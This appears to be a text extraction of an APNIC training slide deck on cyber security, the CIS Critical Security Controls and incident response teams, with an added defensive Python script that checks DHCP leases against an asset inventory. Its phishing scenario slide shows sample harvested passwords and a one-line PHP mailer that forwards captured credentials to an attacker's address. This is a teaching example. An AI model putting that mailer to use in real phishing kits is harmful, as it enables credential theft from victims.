
Page 1: Introduction to Computer Security & Incident Response Teams … · 2016-06-03 · CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations,

APNIC e-Learning: Introduction to Computer Security & Incident Response Teams (CSIRTs)

Issue Date: 3 December 2014

Revision: 1.0

Page 2

Introduction

Page 3

Introduction

•  Current Role
  –  Adli Wahid, Security Specialist @ APNIC
  –  Email: [email protected]
  –  Blog: https://blog.apnic.net
  –  Interests: Computer Security & Incident Response, Security Outreach, Honeynets
  –  Twitter: @adliwahid

•  Other Roles
  –  Board Member of the Forum of Incident Response and Security Teams (FIRST.org)
  –  Member of the Interpol Cyber Crime Expert Group
  –  Previously: Head of Malaysia CERT (MyCERT) & member of the Bank of Tokyo-Mitsubishi UFJ CERT (MUFG-CERT)

Page 4

Security Initiatives @ APNIC

•  Target Audience
  –  Primarily Network Operators & Service Providers, APNIC members
  –  Collaboration with APCERT, INTERPOL and other organizations

Topic | Domain
Resource Public Key Infrastructure (RPKI) | Routing
DNSSEC | DNS
Source Address Validation Everywhere (SAVE) | DDoS Mitigation
Updating IRT References in APNIC Whois Database | Abuse Handling & Incident Response

http://www.apnic.net/security

Page 5

Overview of Today's Tutorial

4 Parts

1.  Quick Introduction to Cyber Security
2.  Technical Threat Landscape
3.  Critical Cyber Security Controls
4.  Introduction to CERTs/CSIRTs

•  Shorter version next week!

•  Credits for Additional Contents
  –  TERENA / GEANT – Technical Threat Landscape
  –  FIRST

Page 6

Main Take-Aways

•  High level overview about cyber security & its challenges to organizations and nations

•  Different types of attacks and the threat landscape

•  Security Response capabilities and security response teams

Page 7

Cyber Security In A Nutshell

Page 8

Cyber Security In A Nutshell

•  How do we think about security?

•  Addressing the CIA triad
  –  Confidentiality, Integrity, Availability

•  Part of Risk Management
  –  Risk = Threats x Vulnerabilities
  –  Dealing with the Known & the Unknown
  –  Understand priorities and the strategy for dealing with risks

Page 9

Cyber Security in a Nutshell (2)

•  Cyber Security Program
  –  Different Components, including Incident Response

•  People, Process, Technology

•  Security is a Process: a Continuous Approach
  –  Including Learning from Incidents
  –  Applying Best Current Practices

•  Cyber Security Framework, Strategies?

•  Let's look at a data breach incident!

Page 10

Data Breach Incident

(Diagram elements: Email with Malicious Attachment; CEO's Laptop; Command and Control Server; External Website (www.web.com); Confidential Information)

Page 11

Threat Landscape (Refer to Threat_Landscape_Terena.pdf)

Page 12

Module 2: Critical Security Controls for Effective Cyber Defense

Page 13

Achieving Security is not Easy

•  Inter-dependencies
  –  Between Entities
     •  Enterprise, Vendors (Software & Hardware), Service Providers
  –  Roles & Responsibilities
     •  Technical & Non-Technical

•  Scale
  –  Bigger & larger systems
  –  Beyond local boundaries

•  Functionality over Security
  –  "It works!"
  –  Market pressure, user complaints

•  For security to work, a lot is required: People, Process, Technology!

•  But – Attackers Do Not Wait!

Page 14

Goals of Information Security

•  Confidentiality: prevents unauthorized use or disclosure of information
•  Integrity: safeguards the accuracy and completeness of information
•  Availability: authorized users have reliable and timely access to information

Page 15

When or where do we secure data?

•  Data In Motion
•  Data at Rest
•  Data In Use

Page 16

Quick Check!

•  How many of us
  –  Encrypt our Hard Disk / Phone
  –  Use 2 Factor Authentication (2FA)
     •  Google, Facebook, LinkedIn
     •  Internet Banking
  –  Use PGP/GnuPG or Email Encryption
     •  for sending confidential information
     •  for verifying the source of an email

•  What are the risks or implications of not using those technologies?

•  Important to apply the defenses, not just learn about the concepts!

Page 17

Security Best Current Practices

•  Adopt a framework, standard or guideline

•  Think about Security Strategically

•  Apply best current practices

•  Validate

•  Review & Improve (Continuous Improvement)

Page 18

Quick Check 2: Cyber Security Hygiene

•  5 steps
  –  Count
  –  Configure
  –  Control
  –  Patch
  –  Repeat

•  How to apply this on a day-to-day basis?

•  How many of us have this approach embedded in our internal procedures?

•  Where do we get the threat intelligence or security updates from?

Page 19

So what is out there?

•  Framework
  –  NIST Cyber Security Framework

•  Strategy
  –  Japan Cyber Security Strategy
     •  http://www.nisc.go.jp/eng/pdf/CyberSecurityStrategy.pdf
  –  UK Cyber Security Strategy
     •  https://www.gov.uk/government/publications/cyber-security-strategy
  –  Collection of National Cyber Security Strategies
     •  https://www.enisa.europa.eu/activities/Resilience-and-CIIP/national-cyber-security-strategies-ncsss/national-cyber-security-strategies-in-the-world

•  Standards
  –  ISMS (Information Security Management System)
  –  NIST 800-53
  –  HIPAA
  –  PCI-DSS
  –  Critical Security Controls

Page 20

Cyber Security Framework

•  NIST Framework For Improving Critical Infrastructure Cyber Security
  –  developed in 2014
  –  https://www.cisecurity.org/images/frame.pdf

•  Provides a way to organize, conduct, and drive the conversation about security goals and improvements

•  However, it does not include any specific risk management process, or specify any priority of action

Page 21

CIS CSC Introduction

•  Initially developed by SANS (sans.org) and now managed by the Center for Internet Security (CIS, cisecurity.org)

•  To secure against cyber attack, organizations must defend against internal & external threats

•  Two guiding principles:
  –  Prevention is ideal but detection is a must
  –  Offense informs defense

Page 22

Goals of CSC

•  What
  –  Protect critical assets, infrastructure, and information

•  How
  –  Strengthening your organization's defensive posture
  –  Focusing on continuous, automated protection and monitoring of your infrastructure

•  Ultimately
  –  Reduce compromises
  –  Minimize the need for recovery efforts
  –  Lower associated costs

•  Making fundamental computer security defenses a well-understood, replicable, measurable, scalable, reliable, automatable, and continuous process

Page 23

Methodology & Contributors

•  Reflects the combined knowledge of actual attacks and effective defenses from experts in many organizations
  –  In the US, UK, Australia

•  The Critical Controls are the most effective and specific set of technical measures to
  –  Detect
  –  Prevent
  –  Mitigate

•  Living document (work in progress) to reflect changing threats and effective defenses

Page 24

CSC Philosophy

•  Offense informs defense: Use knowledge of actual attacks that have compromised systems to provide the foundation to build effective, practical defenses. Include only those controls that can be shown to stop known real-world attacks.

•  Prioritization: Invest first in controls that will provide the greatest risk reduction and protection against the most dangerous threat actors, and that can be feasibly implemented in your computing environment.

•  Metrics: Establish common metrics to provide a shared language for executives, IT specialists, auditors, and security officials to measure the effectiveness of security measures within an organization so that required adjustments can be identified and implemented quickly.

•  Continuous monitoring: Carry out continuous monitoring to test and validate the effectiveness of current security measures.

•  Automation: Automate defenses so that organizations can achieve reliable, scalable, and continuous measurements of their adherence to the controls and related metrics.

Page 25

How to Implement?

•  Step 1. Perform Initial Gap Assessment - determining what has been implemented and where gaps remain for each control and sub-control.

•  Step 2. Develop an Implementation Roadmap - selecting the specific controls (and sub-controls) to be implemented in each phase, and scheduling the phases based on business risk considerations.

•  Step 3. Implement the First Phase of Controls - identifying existing tools that can be repurposed or more fully utilized, new tools to acquire, processes to be enhanced, and skills to be developed through training.

•  Step 4. Integrate Controls into Operations - focusing on continuous monitoring and mitigation and weaving new processes into standard acquisition and systems management operations.

•  Step 5. Report and Manage Progress against the Implementation Roadmap developed in Step 2. Then repeat Steps 3-5 in the next phase of the Roadmap.

Page 26

Practicality

–  Quick wins that provide solid risk reduction without major procedural, architectural, or technical changes to an environment, or that provide such substantial and immediate risk reduction against very common attacks that most security-aware organizations prioritize these key controls.

–  Visibility and attribution measures to improve the process, architecture, and technical capabilities of organizations to monitor their networks and computer systems to detect attack attempts, locate points of entry, identify already-compromised machines, interrupt infiltrated attackers' activities, and gain information about the sources of an attack.

–  Improved information security configuration and hygiene to reduce the number and magnitude of security vulnerabilities and improve the operations of networked computer systems, with a focus on protecting against poor security practices by system administrators and end-users that could give an attacker an advantage.

–  Advanced sub-controls that use new technologies that provide maximum security but are harder to deploy or more expensive than commoditized security solutions.

Page 27

Mapping to other Standards

•  Full URL
  –  https://www.sans.org/media/critical-security-controls/critical-controls-poster-2016.pdf

Page 28

CSC Version 6.0

CSC 1: Inventory of Authorized and Unauthorized Devices
CSC 2: Inventory of Authorized and Unauthorized Software
CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
CSC 4: Continuous Vulnerability Assessment and Remediation
CSC 5: Controlled Use of Administrative Privileges
CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
CSC 7: Email and Web Browser Protections
CSC 8: Malware Defenses
CSC 9: Limitation and Control of Network Ports, Protocols, and Services
CSC 10: Data Recovery Capability

Page 29

CSC Version 6.0 (2)

CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches
CSC 12: Boundary Defense
CSC 13: Data Protection
CSC 14: Controlled Access Based on the Need to Know
CSC 15: Wireless Access Control
CSC 16: Account Monitoring and Control
CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps
CSC 18: Application Software Security
CSC 19: Incident Response and Management
CSC 20: Penetration Tests and Red Team Exercises

Page 30

How To Get Started?

•  The CSC is a list of prioritized, vetted and supported security actions for organizations

•  Use them to assess & improve your current security state

•  "What should I be doing?" -> "What should we ALL be doing?"

•  But you must understand what is critical to your:
  –  Business
  –  Data
  –  Networks
  –  Systems
  –  Infrastructures
  –  Impact of adversaries

Page 31

Priorities

•  Foundational Cyber Security Hygiene: CSC 1 – CSC 5 *
  –  Closely related to the US National Cyber Hygiene Campaign
  –  ASD implementation: http://www.asd.gov.au/infosec/top-mitigations/top-4-strategies-explained.htm

•  For each CSC
  –  Why this control is critical
  –  Actions or Sub-Controls to implement, automate & measure effectiveness of controls
  –  Procedures or Tools to enable implementation
  –  Entity Relationship Diagram to show components of implementation

Page 32

Action Plans

1.  Conduct a gap assessment to compare the organization's current security stance to the detailed recommendations of the Critical Controls

2.  Implement the "First Five" and other "quick win" Critical Controls to address the gaps identified by the assessment over the next one or two quarters

3.  Assign security personnel to analyze and understand how Critical Controls beyond the quick wins can be deployed in the organization's environment

4.  Devise detailed plans to implement the "visibility and attribution" and "hardened configuration and improved information security hygiene" Critical Controls over the next year

5.  Plan for deployment of the "advanced controls" over the longer term.

Page 33

Multiple Views

•  Do we know what is connected to our systems and networks? (CSC 1)

•  Do we know what software is running (or trying to run) on our systems and networks? (CSC 2)

•  Are we continuously managing our systems using “known good” configurations? (CSC 3)

•  Are we continuously looking for and managing “known bad” software? (CSC 4)

•  Do we limit and track the people who have the administrative privileges to change, bypass, or over-ride our security settings? (CSC 5)

Page 34

CSC & Governance

•  Cybersecurity governance is a key responsibility of the board of directors and senior executives

•  IT must be an integral part of overall enterprise governance

•  Executives must have a clear understanding of what to expect from their information security program

•  The CSC helps executives bridge the business perspective of risk management and the technical view of the actions and operational controls that manage those risks

Page 35

Governance & CSC Sample

•  Governance item #1: Identify your most important information assets and the impact on your business or mission if they were to be compromised. (CSC1 & CSC2)

•  Governance Item #2: Manage the known cyber vulnerabilities of your information and make sure the necessary security policies are in place to manage the risk (CSC 3 & 4)

•  Governance Item #3: Clearly identify the key threats to your information and assess the weaknesses in your defense (CSC 8 & CSC 20)

•  Governance Item #4: Confirm and control who has access to the most important information (CSC 5 & CSC 14)

Page 36

CSC 1: Inventory of Authorized and Unauthorized Devices

•  Why Critical?
  –  Attackers continuously scan the address space of target organisations
  –  Attackers look for new & unprotected systems
  –  Attackers look for devices that go in & out of enterprise networks
  –  Attackers take advantage of new hardware / systems not configured properly
  –  Additional systems (demo, test, guest networks)
  –  Bring Your Own Device (Mobile)
  –  Managing all devices is critical for planning & executing system backup & recovery

Page 37

CSC 1: Controls

Family | Control | Description

System | 1.1 | Deploy an automated asset inventory discovery tool and use it to build a preliminary inventory of systems connected to an organization's public and private network(s). Both active tools that scan through IPv4 or IPv6 network address ranges and passive tools that identify hosts based on analyzing their traffic should be employed.

System | 1.2 | If the organization is dynamically assigning addresses using DHCP, then deploy dynamic host configuration protocol (DHCP) server logging, and use this information to improve the asset inventory and help detect unknown systems.

System | 1.3 | Ensure that all equipment acquisitions automatically update the inventory system as new, approved devices are connected to the network.

Page 38

CSC 1: Controls (Cont)

System | 1.4 | Maintain an asset inventory of all systems connected to the network and the network devices themselves, recording at least the network addresses, machine name(s), purpose of each system, an asset owner responsible for each device, and the department associated with each device. The inventory should include every system that has an Internet protocol (IP) address on the network, including but not limited to desktops, laptops, servers, network equipment (routers, switches, firewalls, etc.), printers, storage area networks, Voice-over-IP telephones, multi-homed addresses, virtual addresses, etc. The asset inventory created must also include data on whether the device is a portable and/or personal device. Devices such as mobile phones, tablets, laptops, and other portable electronic devices that store or process data must be identified, regardless of whether they are attached to the organization's network.

System | 1.5 | Deploy network level authentication via 802.1x to limit and control which devices can be connected to the network. The 802.1x must be tied into the inventory data to determine authorized versus unauthorized systems.

System | 1.6 | Use client certificates to validate and authenticate systems prior to connecting to the private network.
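Controls 1.2 and 1.4 above describe a reconciliation job rather than a product: take the DHCP server's log, join it against the authorized inventory, and treat anything that got a lease but is not in the inventory as an unknown system. The script below is an added example, not code from the APNIC deck or from CIS. It parses ISC dhcpd DHCPACK syslog lines, reports MAC addresses that obtained a lease but are absent from the inventory, lists inventory rows missing any of the minimum CSC 1.4 fields, and flags known devices whose leased address no longer matches the recorded one. The log lines, MAC addresses, hostnames and inventory records are constructed for the example; the DHCPACK line layout follows ISC dhcpd's syslog format.

```python
"""Reconcile DHCP leases with an authorized device inventory (CSC 1.2) and
check inventory completeness (CSC 1.4). Added example; log lines, addresses,
hostnames and inventory rows are constructed, not real data."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of ISC dhcpd syslog output. Only DHCPACK lines mean the
# server actually committed a lease; DHCPREQUEST lines are just a client asking.
DHCP_LOG = """\
Jun  2 09:14:01 dhcp1 dhcpd: DHCPACK on 10.10.20.15 to 3c:22:fb:01:02:03 (fin-ws-07) via eth0
Jun  2 09:14:03 dhcp1 dhcpd: DHCPACK on 10.10.20.16 to 3c:22:fb:04:05:06 (ceo-laptop) via eth0
Jun  2 09:15:40 dhcp1 dhcpd: DHCPREQUEST for 10.10.20.99 from d8:3a:dd:aa:bb:cc via eth0
Jun  2 09:15:40 dhcp1 dhcpd: DHCPACK on 10.10.20.99 to d8:3a:dd:aa:bb:cc via eth0
Jun  2 09:16:12 dhcp1 dhcpd: DHCPACK on 10.10.20.16 to 3c:22:fb:04:05:06 (ceo-laptop) via eth0
"""

# Minimum fields CSC 1.4 asks for, plus the MAC used as the join key.
REQUIRED_FIELDS = ("mac", "address", "name", "purpose", "owner", "department")

# Constructed inventory: the second row has a stale address and no owner.
INVENTORY = [
    {"mac": "3c:22:fb:01:02:03", "address": "10.10.20.15", "name": "fin-ws-07",
     "purpose": "finance workstation", "owner": "J. Lee", "department": "Finance"},
    {"mac": "3c:22:fb:04:05:06", "address": "10.10.20.20", "name": "ceo-laptop",
     "purpose": "executive laptop", "owner": "", "department": "Executive"},
]

# "DHCPACK on <ip> to <mac> [(<hostname>)] via <iface>"; the hostname is
# optional because clients are not obliged to send DHCP option 12.
ACK_RE = re.compile(
    r"DHCPACK on (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) to "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Lease:
    ip: str
    mac: str
    host: Optional[str]
    iface: str


def parse_acks(log_text: str) -> list:
    """One Lease per DHCPACK line; MACs are lower-cased so they join cleanly."""
    leases = []
    for line in log_text.splitlines():
        m = ACK_RE.search(line)
        if m:
            leases.append(Lease(m["ip"], m["mac"].lower(), m["host"], m["iface"]))
    return leases


def unknown_devices(leases, inventory) -> list:
    """Devices that obtained a lease but are not in the inventory (the CSC 1.2
    'unknown system' signal). One entry per MAC, since a host renews repeatedly."""
    known = {row["mac"].lower() for row in inventory}
    first_seen = {}
    for lease in leases:
        if lease.mac not in known and lease.mac not in first_seen:
            first_seen[lease.mac] = lease
    return list(first_seen.values())


def incomplete_records(inventory) -> list:
    """(mac, [missing fields]) for rows lacking any CSC 1.4 minimum field."""
    problems = []
    for row in inventory:
        missing = [f for f in REQUIRED_FIELDS if not row.get(f)]
        if missing:
            problems.append((row.get("mac", "?"), missing))
    return problems


def address_mismatches(leases, inventory) -> list:
    """Known MACs whose leased IP differs from the recorded address: the
    inventory is stale or the host moved. Returned as (mac, recorded, leased)."""
    recorded = {row["mac"].lower(): row["address"] for row in inventory}
    return sorted({(l.mac, recorded[l.mac], l.ip) for l in leases
                   if l.mac in recorded and recorded[l.mac] != l.ip})


if __name__ == "__main__":
    leases = parse_acks(DHCP_LOG)
    for d in unknown_devices(leases, INVENTORY):
        print(f"UNKNOWN  {d.mac} leased {d.ip} on {d.iface}, hostname={d.host!r}")
    for mac, missing in incomplete_records(INVENTORY):
        print(f"INCOMPLETE inventory row {mac}: missing {', '.join(missing)}")
    for mac, rec, leased in address_mismatches(leases, INVENTORY):
        print(f"MISMATCH {mac}: inventory says {rec}, lease says {leased}")
```

To run it against a real dhcpd log, replace DHCP_LOG with the file contents and INVENTORY with an export of the asset register. Only DHCPACK lines count, because a DHCPDISCOVER or DHCPREQUEST shows a device asking for an address, not one the server committed to. A hit from unknown_devices() is the unknown-system signal control 1.2 asks for and should go into the inventory review, not be silenced; the incomplete_records() output is a direct measure of how far the register is from the 1.4 minimum.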

Page 39

CSC1: Procedures & Tools

•  Technical & Procedural actions

•  Manage inventory of hardware and all associated information throughout its lifecycle.

•  Use enterprise level tools that collect information actively or passively

•  Challenge in how to maintain current & accurate view of IT assets

•  Example of tools or software solutions?

Page 40

Page 41

CSC 1: Metrics

Page 42

What is a CSIRT/CERT? (Refer to FIRST_CERT_Intro.pdf)

Page 43

Scenarios

Page 44

Think About

•  How would you handle this incident in your organisation?

•  How do you prioritize the tasks required to handle the incidents?

•  What kinds of tools or skills are required to analyze it?

•  If you need assistance, who would you contact?

•  If contacted by the media what do you tell them?

•  What are the post-incident activities you would do?

Page 45

DDoS Threat

Date: Day, Month 2011
Subject: Partnership
From: Attacker
To: You

Your site does not work because We attack your site. When your company will pay to us we will stop attack. Contact the director. Do not lose clients.

Page 46

Identity Theft / Phishing Example (diagram with four numbered parts)

1.  The phishing email:
    Dear User, We have introduced a new security feature on our website. Please reactivate your account here: http://www.bla.com.my
    P.S. This is NOT a Phish Email

2.  The fake login page, with Login and Password fields

3.  Credentials harvested by the page:
    mark:1234567
    joey:cherry2148
    boss:abcdefgh123
    finance:wky8767
    admin:testtest123

4.  The mailer script in the phishing kit that forwards the captured credentials to the attacker:
    <?php $mailto='[email protected]'; mail($mailto,$subject,$message); ?>

Page 47

Conclusion

Page 48

Take-Aways

•  Don’t Wait For a Security Incident! –  How are you addressing Cyber Security in your organisation?

•  Review Incident Response & Handling Capabilities –  Think of Some Scenarios –  Policies & Procedures –  Point of Contact (PGP Key) –  Collaboration / Co-operation with others

•  Training & Learning More –  CSIRT Conferences & Events –  Best Practices Documents and Guidelines

Page 49

References

•  Recommended
  –  RFC 2350, Expectations for Computer Security Incident Response
     •  https://www.rfc-editor.org/rfc/rfc2350.txt
  –  APCERT (Asia Pacific Computer Emergency Response Team)
     •  http://www.apcert.org
  –  Forum of Incident Response and Security Teams (FIRST)
     •  http://www.first.org
  –  European Union Agency for Network & Information Security (ENISA)
     •  http://www.enisa.europa.eu/activities/cert
  –  NIST
     •  SP 800-61 Revision 2, Computer Security Incident Handling Guide
     •  http://csrc.nist.gov/publications/nistpubs/800-61rev2/SP800-61rev2.pdf
  –  Best Practice Forum @ IGF 2014
     •  Establishing and Supporting Computer Emergency Response Teams (CERTs) for Internet Security
     •  http://bit.ly/11MwuCI

Page 50

Final Notes

•  Certificates
  –  Participants not at the AUAF venue should send an email to [email protected] to confirm attendance; an electronic certificate will be emailed to them.

•  Survey: https://www.surveymonkey.com/r/TSEC02-02JUN2016

Page 51

More Information

•  Email: [email protected]

•  Twitter: @adliwahid

•  LinkedIn: Adli Wahid

Page 52

Thank You! End of Session